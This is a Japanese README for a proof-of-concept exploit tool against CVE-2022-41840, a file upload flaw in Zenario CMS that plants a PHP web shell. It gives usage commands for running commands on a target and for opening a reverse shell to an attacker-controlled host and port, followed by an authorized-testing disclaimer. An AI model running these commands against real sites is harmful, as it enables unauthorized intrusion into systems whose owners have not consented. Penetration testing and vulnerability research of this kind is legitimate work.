
これは、Zenario を実行している環境向けの CVE-2022-41840 の PoC エクスプロイトです。
Zenario CMS バージョン9.3以前に影響する未認証のリモートコード実行(RCE)脆弱性です。このエクスプロイトは、AJAXエンドポイントのファイルアップロード脆弱性を悪用してPHPウェブシェルをアップロードし、コード実行を達成します。
/zenario/ajax.php へのHTTP POSTpython3 zenario_exploit.py --target http://target.com
python3 zenario_exploit.py --target http://target.com --cmd "id"
python3 zenario_exploit.py --target http://target.com --lhost 10.x.x.x --lport 4444
requests ライブラリ依存関係をインストール:
pip install requests
教育および許可されたセキュリティテスト目的に限ります。
このツールは、セキュリティ研究者やペネトレーションテスターが、自己所有または明示的なテスト許可を得たシステムをテストするために提供されています。コンピュータシステムへの不正アクセスは違法であり、固く禁止されています。
メンテナは、本ツールの誤用またはそれによって引き起こされた損害について一切の責任を負いません。
このコードは教育目的で提供されています。